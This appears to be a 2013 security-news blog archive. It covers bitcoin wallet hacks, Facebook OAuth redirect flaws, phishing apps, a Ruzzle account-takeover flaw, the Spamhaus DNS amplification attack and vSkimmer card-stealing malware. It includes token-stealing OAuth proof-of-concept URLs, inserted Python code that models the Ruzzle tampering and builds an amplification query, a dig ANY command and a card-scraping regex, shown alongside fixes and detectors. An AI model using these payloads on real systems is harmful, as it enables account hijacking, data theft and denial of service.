Latest News

Friday 5 April 2013

Bitcoin's Wallet Service Instawallet Hacked, suspended indefinitely


The digital currency Bitcoin has suffered yet another hack. Bitcoin wallet site Instawallet has been taken offline after a security compromise and has suspended its service indefinitely.
Instawallet did not say in the notice on its website how many bitcoins were stolen after attackers fraudulently accessed the company's database. "The Instawallet service is suspended indefinitely until we are able to develop an alternative architecture. Our database was fraudulently accessed, due to the very nature of Instawallet it is impossible to reopen the service as-is."

Bitcoin is a decentralised digital currency in which transactions are signed with public-key cryptography and confirmed by a peer-to-peer network rather than a central authority. The company also announced that it will accept claims for individual Instawallets for the first 90 days; a claim is filed using the wallet's URL and key. Clients whose balance is less than 50 BTC will then be refunded the currency value.

The breach follows a series of attacks on bitcoin services. In September 2012, Bitfloor suspended all operations after a hacker stole about $250,000 worth of bitcoins. In May of the same year the exchange Bitcoinica was also breached, and attackers made off with bitcoins valued at around $90,000.

It may be a day or two before the effect of this theft on the currency can be determined. Bitcoin-Central, whose service is also currently down, expects to have its services back up within 48 hours and has promised 24 hours' notice before going live again. Instawallet, however, has been permanently compromised and is closing.

URL Redirection flaw in Facebook apps push OAuth vulnerability again in action

In earlier posts, Facebook hacker Nir Goldshlager exposed two serious Facebook OAuth flaws: one allowed a Facebook account to be hijacked even when the user had not installed any application, and the other showed various ways of bypassing the regex protection in Facebook's OAuth implementation.
This time Nir illustrated a further attack scenario: what happens when an application is already installed on the victim's account, and how easily an attacker can abuse it. According to him, if the victim has an installed application such as Skype or Dropbox, the attacker is still able to take control of the account.



For this, an attacker needs only a URL redirection or cross-site scripting vulnerability on the domain of the app's owner (in this scenario, the Skype Facebook app). Note that in many bug bounty programmes, Google's among them, an open URL redirection on its own is not considered a rewardable vulnerability, which is why such flaws tend to linger.
Nir also demonstrated that an attacker can find out which applications a victim is using. Example URL: https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m
Because Facebook applications are developed by third-party developers, who own the app and its domain, Facebook itself cannot fix such potentially pernicious redirection flaws on the app owners' sites.

Continuing the method used in the last two OAuth flaws (mentioned here), this time the attack uses a redirection flaw on the app's own domain, reached through the "redirect_uri" / "next" parameter, to steal the access_token of Facebook users.

POC (using the Skype app): https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (using the Dropbox app): https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1


The attacker's purpose is simply to steal the victim's access_token through these Facebook OAuth flaws, so that he can take full control of the victim's account remotely without ever knowing the password. Because the PoC requests response_type=token, the token is delivered in the URL fragment of the redirect target, and an open redirect on that target forwards the fragment along with it.


Note: The flaw was reported to the Facebook security team by Nir Goldshlager, but it cannot be fixed by Facebook alone. App developers are responsible for their own programming mistakes, so the issue remains unfixed for millions of other apps.
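The following is an added example, not Nir Goldshlager's or Facebook's code. It models the two sides of the flaw above: a weak redirect check that accepts any URL on the app owner's domain (which is what lets the Skype PoC through, since metrics.skype.com hosts an open redirect behind a "url" parameter), and the exact-match allow-list check that an authorization server should apply instead. The PoC "next" value is taken from the article; the app domain set, the registered callback URI and the token value are assumptions made for the example.

```python
"""Added example (not Facebook's or Nir Goldshlager's code): why a domain-level
check on the OAuth `next` / `redirect_uri` parameter is not enough when the app
owner's domain hosts an open redirect, and what an exact-match allow-list does."""
from urllib.parse import urlparse, parse_qs

# The `next` value from the Skype PoC in the article. Facebook sends the token to
# this URL, and the open redirect on metrics.skype.com forwards it onwards.
SKYPE_POC_NEXT = ("http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/"
                  "?url=http://files.nirgoldshlager.com")

# Hypothetical registration data for the Skype app (assumption, not Facebook's real config).
APP_DOMAINS = {"skype.com"}
REGISTERED_REDIRECT_URIS = {"https://www.skype.com/oauth/facebook/callback"}


def host_is_on_app_domain(uri, app_domains=APP_DOMAINS):
    """The weak check: accept any URL whose host is the app domain or a subdomain
    of it. This is what the attack relies on: metrics.skype.com passes."""
    host = (urlparse(uri).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in app_domains)


def uri_is_registered_exactly(uri, registered=REGISTERED_REDIRECT_URIS):
    """The strict check: scheme, host, port and path must match a pre-registered
    URI exactly, and no query string or fragment is allowed, so an open redirect
    sitting behind `?url=` can never be reached from the authorization server."""
    p = urlparse(uri)
    if p.scheme != "https" or p.query or p.fragment or not p.hostname:
        return False
    port = f":{p.port}" if p.port else ""
    canonical = f"{p.scheme}://{p.hostname.lower()}{port}{p.path or '/'}"
    return canonical in registered


def open_redirect_target(uri, param="url"):
    """Where the token ends up if the app domain hosts an open redirect of the
    `?url=` form used in the PoC (the parameter name is the one in the PoC URL)."""
    return parse_qs(urlparse(uri).query).get(param, [None])[0]


def simulate_implicit_grant(next_uri, token, check):
    """Model the implicit grant (response_type=token): if `check` accepts
    `next_uri`, the authorization server redirects there with the token in the
    fragment. Returns the URL the browser finally lands on, or None if blocked."""
    if not check(next_uri):
        return None
    landing = f"{next_uri}#access_token={token}"
    hop = open_redirect_target(next_uri)
    if hop:
        # Browsers keep the fragment across a 3xx redirect whose Location has no
        # fragment of its own, so the token travels to the attacker's host.
        landing = f"{hop}#access_token={token}"
    return landing


if __name__ == "__main__":
    print("weak check  ->", simulate_implicit_grant(SKYPE_POC_NEXT, "TOKEN", host_is_on_app_domain))
    print("strict check->", simulate_implicit_grant(SKYPE_POC_NEXT, "TOKEN", uri_is_registered_exactly))
```

The strict check is the identity provider's side of the fix; the app owner's side is simply not to host an unauthenticated redirect on any host that is an acceptable OAuth callback. The fragment-forwarding behaviour modelled in simulate_implicit_grant is standard browser behaviour, which is why a token-in-fragment flow is only as safe as every redirect on the callback host.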

Thursday 4 April 2013

Facebook Apps Promise Change but In Reality Phish Your Information

Spammy Facebook apps are nothing new: the web giant has been dealing with suspicious apps since it launched the Facebook Platform for developers in 2007. As an open development platform, it lets anyone create an app, including people who really just want to steal your information, and your money.
With cyber crime, including identity theft, on the rise, more Facebook users should pay closer attention to what they click on, especially if it is shared in a spammy way. Sophos reports that nearly 60,000 people clicked on one scam in particular, which promises to let you see who has viewed your profile. The app automatically posts a comment to the user's timeline, sometimes as a photo, with the message 'OMG OMG OMG... I can't believe this actually works! Now you really can see who viewed your profile! on (link here)'.
The app does not actually let users see profile views; instead it leads them, and anyone who clicks on the link posted to their wall, to a phishing scam designed to steal personal information. Despite the red flags, Sophos, which tracked a single link through bit.ly, found that more than 58,000 people clicked on it before it was shut down.

Real Life Example
Another all-too-common Facebook phishing app is the 'Facebook Colors' app, which can appear as 'Facebook Green', 'Facebook Red' or, in the case of this demonstration, 'Facebook Black'. The following app was installed on a computer with fully working antivirus, including a link scanner.
First, Facebook Black shows a couple of spammy properties right off the bat. Typically, when real people post, they do not post a photo and a comment together, which is the first sign. Second, most will say something other than 'check it out'. Last but not least, if you see more than one person posting the same comment with a link, you definitely have a spam app on your hands. For anyone looking forward to installing a black Facebook, let's look at where this particular app goes.
What this shows is that despite being advertised as a Facebook application, it is actually a browser extension. You have to allow it on Facebook first, but you will then be asked to allow it in your browser as well. Should you install it to test it yourself, you can uninstall it from your browser's extensions. After clicking 'add' you would expect to be taken to a 'black' Facebook. Instead, you get this page.
You can click on any of the three 'you've won' options; I tested all three, and while two led to phishing websites, one was actually broken, which is more than a little hilarious. The broken link actually goes to this page.

Which is absolutely nowhere, and just about the safest place you will get to with this particular app installed in your browser. One of the other links was slightly less benign and was actually picked up by the browser's link scanner.
Many Facebook scam and phishing apps promise users things that seem hard to resist. Options such as profile personalisation, viewing the people who spend time on your profile, and even some games can instead steal your information, spam your friends with malware, and post items on your wall without your permission. Most of these apps are designed to make money for their maker in one way or another, and usually that money is made off you.

Warning Signs
Most apps on Facebook are perfectly benign and can be used without a problem. There are, however, a few basic signs you can look out for to help recognise scam and phishing apps:
  • Automatic tagging and sharing links
  • Automatic Commenting and sharing links
  • Automatic Invitations
  • Promised Features That You Haven't Already Seen in Use
  • The App Vanishes With No Results After Being Installed
Removing a Spam or Phishing App from Your Facebook
If an app you have installed shows any of the signs above, you should remove it as quickly as possible. The current version of Facebook lets you control exactly which apps have access to your profile: click the small gear in the upper left-hand corner, then 'settings', then 'apps'. From there you can remove anything you are not familiar with or did not install.

If the app has in fact installed itself in your browser, you can usually uninstall it by going into tools and then extensions or add-ons, depending on which browser you are using.

Studies show that identity theft is once again rising to become the most common scam. Phishing emails and apps are among the easiest ways to steal an identity, including name, phone number, credit card details and even home address. An estimated 12.6 million Americans were victims of identity theft in 2012, a number nearly as high as the 2009 record of 13.9 million. The only real protection is to exercise caution and think before you click.

Guest Post by Brandy Cross, freelance writer and tech blogger for The High Tech Society. She loves hot cups of tea, zombies, games, and learning new things.

Italian team discovers flaw in Ruzzle protocol, a serious menace to privacy

We live in a digital era: everything is connected to large networks, and applications run on ever more complex devices that interact deeply with their owners. In this scenario security requirements take on crucial importance, and the security of the overall architecture also depends on the security of each single component.

In recent months mobile users have gone crazy for a simple game named Ruzzle, developed by the Swedish gaming company MAG Interactive and available for iOS and Android devices.

The game mechanics are inspired by the board games Boggle and Scrabble. In early 2013 researchers at Hacktive Security started a study of the most widespread mobile applications, including the popular Ruzzle, focusing on the protocol implemented and its possible repercussions for users' privacy.

The Ruzzle protocol uses JSON for the responses within a user's session; the security analysts discovered that these can be tampered with because the server does not validate the data sent by the application.
The lack of server-side validation is widely exploited in web applications, typically to raise the attacker's privileges or, worse, to impersonate the victim within an authenticated session.

The research demonstrated that it is possible to gain access to the victim's profile without ever authenticating as the victim, and of course to perform any action exactly as the attacked user would.

One of the most interesting components of the Ruzzle game is the chat: today the key feature of any game is its social aspect, its ability to put users in direct contact simply to play a game or exchange messages.
Ruzzle is no exception to this rule, and the experts at Hacktive Security demonstrated that an ill-intentioned user can obtain full control of a victim's account, with serious repercussions.

The attacker can access the whole list of played games, including current ones, and could also challenge the victim's friends. But the most concerning thing is that the attacker could read the victim's private messages exchanged with other users via the internal chat feature and could impersonate the victim in other chat conversations.

Following the evidence provided by the team of analysts in their blog post: on opening Ruzzle on a mobile device, the app performs the login through a request using a classic HTTP POST:
(screenshot 1: the login POST request)
The POST above is the request originated by the client, containing the parameters submitted through the application (in this case the login is performed through the Facebook authentication integration).

As shown above, all the information related to the user's identity is included in the JSON structure sent as the response; this data can easily be intercepted and manipulated, for example simply by modifying the value of the userId parameter used to identify the victim.
(screenshot 2: the JSON login response containing userId)
To obtain the value of a userId it is enough to intercept the regular traffic generated by Ruzzle while challenging the chosen victim. We proceeded to tamper with the value of the userId parameter, replacing it with the one assigned to our victim:
(screenshot 3: the request with the tampered userId)
Once this is done, the last step is to tamper with a few other parameters inside the refreshCache POST. The parameters that need to be tampered with are the following cacheKey values:
  • listRequests_NNNNNNNNN
  • listInvites_NNNNNNNNN
  • listActiveGames_NNNNNNNNN
  • list_FinishedGames_NNNNNNNNN
NNNNNNNNN represents the userId; in the POST originated by Ruzzle it carries the legitimate userId cached by the app. Submitting these cacheKey values with the victim's userId in the numeric part after the underscore is the final step. The JSON response to this POST indeed loads into the Ruzzle app all the data about the victim's account, as briefly reported below.
(screenshot 4: the refreshCache response with the victim's data)
At this point the attack is complete: the Ruzzle client on the mobile device has access to the victim's account, including all the information described above.
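An added example, not Ruzzle's code and not Hacktive Security's, that models the refreshCache step described above. It shows the attacker's rewrite of userId and of the numeric suffix of each cacheKey, a handler that trusts those client-supplied ids (the behaviour the researchers describe), and a hardened handler that derives the user id from the authenticated session and refuses any id that names someone else. The user ids, session tokens and game data are constructed for the example; the cacheKey names are the ones listed in the article.

```python
"""Added example (not Ruzzle's or Hacktive Security's code): the refreshCache
request with tampered ids, versus a handler that binds every id to the session."""
import re

# Constructed backend state for two users (assumption).
USER_DATA = {
    111111111: {"listActiveGames": ["game-A1"], "listInvites": []},
    222222222: {"listActiveGames": ["game-B1", "game-B2"], "listInvites": ["from-111111111"]},
}
# Session token -> user id, as established by the login step (constructed).
SESSIONS = {"sess-attacker": 111111111, "sess-victim": 222222222}

# The four cacheKey prefixes from the article, followed by "_<userId>".
CACHE_KEY_RE = re.compile(r"^(listRequests|listInvites|listActiveGames|list_FinishedGames)_(\d+)$")


def parse_cache_key(key):
    """'listActiveGames_222222222' -> ('listActiveGames', 222222222)."""
    m = CACHE_KEY_RE.match(key)
    if not m:
        raise ValueError(f"malformed cacheKey: {key!r}")
    return m.group(1), int(m.group(2))


def tamper(request, victim_id):
    """The attacker's step: rewrite userId and the numeric suffix of every
    cacheKey to the victim's id, leaving the attacker's own session in place."""
    return {
        **request,
        "userId": victim_id,
        "cacheKeys": [f"{parse_cache_key(k)[0]}_{victim_id}" for k in request["cacheKeys"]],
    }


def refresh_cache_vulnerable(request):
    """Trusts userId and the cacheKey suffixes exactly as sent, which is the
    behaviour the article describes: the victim's lists come back to whoever asks."""
    cache = {}
    for key in request["cacheKeys"]:
        kind, uid = parse_cache_key(key)
        cache[key] = USER_DATA.get(uid, {}).get(kind, [])
    return 200, {"userId": request["userId"], "cache": cache}


def refresh_cache_hardened(request):
    """Derives the user id from the session and refuses any userId or cacheKey
    that names another user, so the ids in the body are never an authority.
    Returns (status, body) like the vulnerable handler."""
    uid = SESSIONS.get(request.get("session"))
    if uid is None:
        return 401, {"error": "no valid session"}
    if request.get("userId") != uid:
        return 403, {"error": "userId does not match session"}
    cache = {}
    for key in request["cacheKeys"]:
        kind, key_uid = parse_cache_key(key)
        if key_uid != uid:
            return 403, {"error": f"cacheKey {key} belongs to another user"}
        cache[key] = USER_DATA[uid].get(kind, [])
    return 200, {"userId": uid, "cache": cache}


if __name__ == "__main__":
    own = {"session": "sess-attacker", "userId": 111111111,
           "cacheKeys": ["listActiveGames_111111111", "listInvites_111111111"]}
    evil = tamper(own, 222222222)
    print("vulnerable:", refresh_cache_vulnerable(evil))
    print("hardened:  ", refresh_cache_hardened(evil))
```

The point of the hardened handler is that the cacheKey is treated as a name for a cache slot, never as an authorization decision: the only id that selects data is the one the server already associated with the session at login.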

What lesson has the Hacktive Security team given us?
There are several points for discussion arising from the Italian team's study. The first concerns the level of exposure a user faces simply through ordinary internet access: even a simple application can be exploited by attackers to violate our privacy. Be aware of which applications you use and in which context. BYOD is a hotly debated topic today, and the improper use of applications in the workplace could expose sensitive company information, with serious consequences.

The second consideration concerns the design of mobile applications and the need to put the user's security first, even when developing a video game. Mobile devices are powerful platforms that attackers can exploit for various purposes; games are a principal vector of infection and can easily be used to gain access to users' devices.

The app world is growing at an impressive rate, pushed by the explosion of the mobile market, but we cannot forget that apps also run in other contexts, such as appliances. For this reason I believe that software producers have to recognise and share a set of minimum security requirements ... I hope that in the future it will not be so simple to access the data managed by an application like Ruzzle.

Wednesday 3 April 2013

Anonymous Hackers claim to breach North Korean site Uriminzokkiri

Hacking group Anonymous claims to have broken into the North Korean site Uriminzokkiri.com and obtained more than 15,000 user credentials. A message posted online makes the claim and includes details of six accounts, apparently showing user names, e-mail addresses, birth dates and hashed passwords.
"Enjoy these few records as a proof of our access to your systems (random innocent citizens, collateral damage, because they were stupid enough to choose idiot passwords), we got all over 15k membership records of www.uriminzokkiri.com and many more. First we gonna wipe your data, then we gonna wipe your badass dictatorship "government"."

Of the six users, three have Korean names and the other three appear to be Chinese. The message continues: "North Korean government is increasingly becoming a threat to peace and freedom. We demand: - N.K. government to stop making nukes and nuke-threats, uncensored internet access for all the citizens and Kim Jong-un to resign"

Four of the six users have Chinese email addresses; there is one Hotmail address and one South Korean address that apparently belongs to KEPCO KDN, a smart-grid systems provider that is part of the Korea Electric Power Co.

"Don't fear us, we are not terrorist, we are the good guys from the internet. AnonKorea and all the other Anons are here to set you free. We are Anonymous We are Legion We do not forgive We do not forget Expect us!" the message reads.

Friday 29 March 2013

World's biggest DDoS attack that Almost Broke the Internet


Last week saw what was probably the largest distributed denial-of-service (DDoS) attack ever. A massive 300 Gbps was thrown at the website of Internet blacklist maintainer Spamhaus, but CloudFlare, to which the anti-spam organisation had turned for DDoS protection, was able to absorb the attack and get Spamhaus's core services back up and running.

Spamhaus, based in both London and Geneva, is a non-profit organisation that helps email providers filter out spam and other unwanted content. Spamhaus is fairly resilient, as its own network is distributed across many countries, but the attack was still enough to knock its site offline on 18 March.

Five national cyber-police forces are investigating the attacks. A group calling itself STOPhaus, an alliance of hacktivists and cyber criminals, is believed to be responsible for bombarding Spamhaus with up to 300 Gbps.


The attacks on Spamhaus illustrate a larger problem: the vulnerability of a system fundamental to the architecture of the Internet, the Domain Name System (DNS). The high attack bandwidth is made possible because attackers use misconfigured DNS servers, known as open recursive resolvers or open recursors, to amplify a much smaller stream of requests into a far larger flood of responses.

Known as DNS reflection, the technique sends small requests for a relatively large DNS answer (here, all records of a zone) with the source address spoofed to the intended victim's network, so the resolvers deliver their large responses to the victim. According to CloudFlare, it initially recorded over 30,000 DNS resolvers that were tricked into participating in the attack. There are as many as 25 million of these open recursive resolvers at the disposal of attackers.

"In the Spamhaus case, the attacker was sending requests for the DNS zone file for ripe.net to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY ripe.net @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."
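The following is an added example, not CloudFlare's code. It builds, in raw DNS wire format, the query that the quote describes (ANY for ripe.net with an EDNS0 OPT record advertising a 4096-byte UDP buffer), so that its size can be measured offline, parses it back, and computes the amplification factor against the approximately 3,000-byte response CloudFlare reports. Nothing is sent on the network; the transaction id and the response size are taken as given.

```python
"""Added example (not CloudFlare's code): the ~36-byte DNS amplification query,
built and parsed in wire format, and the resulting amplification factor."""
import struct

QTYPE_ANY, QCLASS_IN, TYPE_OPT = 255, 1, 41


def encode_name(name):
    """'ripe.net' -> b'\\x04ripe\\x03net\\x00' (RFC 1035 label encoding)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_any_query(name, bufsize=4096, txid=0x1234):
    """Wire equivalent of `dig ANY <name> +edns=0 +bufsize=4096`: one question,
    one OPT pseudo-RR in the additional section, RD set, DO bit clear."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)
    question = encode_name(name) + struct.pack("!HH", QTYPE_ANY, QCLASS_IN)
    # OPT RR: root name, TYPE=41, the CLASS field carries the advertised UDP
    # payload size, the TTL field carries ext-RCODE/version/flags (all zero here),
    # RDLENGTH=0.
    opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, bufsize, 0, 0)
    return header + question + opt


def decode_name(pkt, off):
    """Inverse of encode_name. Queries do not use compression pointers, so none
    are handled here."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n


def parse_query(pkt):
    """Return qname, qtype and the advertised EDNS buffer size (0 if no OPT RR).
    Assumes a query: no answer or authority records before the additional section."""
    _txid, _flags, _qd, _an, _ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    bufsize = 0
    for _ in range(ar):
        _, off = decode_name(pkt, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10 + rdlen
        if rtype == TYPE_OPT:
            bufsize = rclass
    return {"qname": qname, "qtype": qtype, "bufsize": bufsize}


def amplification(request_len, response_len):
    """Bytes the victim receives per byte the attacker sends."""
    return response_len / request_len


def is_amplification_probe(pkt, min_bufsize=4096):
    """Resolver-side heuristic: an ANY query that also advertises a large EDNS
    buffer is exactly the shape that maximises the reflected response."""
    q = parse_query(pkt)
    return q["qtype"] == QTYPE_ANY and q["bufsize"] >= min_bufsize


if __name__ == "__main__":
    q = build_any_query("ripe.net")
    print(len(q), "byte request,", parse_query(q))
    print("amplification vs a 3000-byte answer: %.0fx" % amplification(len(q), 3000))
```

The query comes out at 37 bytes of UDP payload, matching CloudFlare's "approximately 36" to within a byte, which against a 3,000-byte answer gives a factor of roughly 80x (CloudFlare rounds this to 100x). The heuristic in is_amplification_probe is the kind of signal a resolver operator can act on; the real fix is not to be an open resolver at all, which in BIND means restricting allow-recursion to your own networks, and to deploy response rate limiting for authoritative servers.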

It now seems that the attack was orchestrated by a Dutch hosting company called CyberBunker. As long as it is not child pornography or anything related to terrorism, CyberBunker will host it, spam senders included. Spamhaus blacklisted CyberBunker earlier in the month.

The DDoS attacks have raised concerns that further escalation of the retaliatory attacks could affect banking and email systems. DDoS attacks are typically carried out to extort money from the targeted organisations or as a weapon to disrupt organisations or companies in pursuit of ideological, political or personal interests.

Thursday 28 March 2013

Russian underground vSkimmer Botnet targeting payment world

A new botnet has emerged from the underground and is menacing the payment world: the threat, dubbed vSkimmer, comes from Russia according to security firm McAfee.

McAfee researcher Chintan Shah wrote in a blog post that, while monitoring a Russian underground forum, he found a discussion about a Trojan for sale that can steal credit card information from Windows PCs used for financial transactions and card payments.
The vSkimmer agent is able to detect card readers on the victim's machine, gather the card data and send it to a remote control server, Base64-encoded (Base64 is an encoding rather than encryption, so it hides nothing from anyone inspecting the traffic).

The malware collects the following information from the infected machine and sends it to the control server:
  • Machine GUID from the Registry
  • Locale info
  • Username
  • Hostname
  • OS version
vSkimmer is described as the successor of the well-known Dexter, financial malware that targeted point-of-sale systems to grab card data as it was transmitted during the sales flow.

Dexter is blamed for the loss of nearly 80,000 credit card records and for the breach of payment card data at Subway restaurants in 2012.

According to McAfee's researchers, vSkimmer has been on offer in the underground forum since February and could be an ongoing project.

To be precise, Track 2 of the magnetic stripe stores the card number, the expiration date and a three-digit card verification code (the CVV1 in the stripe's discretionary data, not the CVV2 printed on the back), all of which is needed to qualify the card in payment processes.

On the grabbing of card information, the post states:
"VSkimmer maintains the whitelisted process, which it skips while enumerating the running processes on the infected machine. Once vSkimmer finds any running process not in the whitelist, it runs OpenProcess and ReadProcessMemory to read the memory pages of the process and invokes the pattern-matching algorithm to match the regular expression "?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??") and extract the card info read by the payment devices. This is done recursively for every process running in the infected machine and not on the whitelist."

vSkimmer demonstrates cyber crime's great interest in the payments sector. Institutions in this sector have already been attacked in the past by malicious code such as Zeus and SpyEye, and this case is just "another example of how financial fraud is actively evolving and how financial Trojans were developed and passed around in the underground community. This botnet is particularly interesting because it directly targets card-payment terminals running Windows," Shah explained in his post. I find it really interesting that the supply of such malware in the underground is increasing and that its sales model is reaching a level of polish never seen before ... we face difficult times.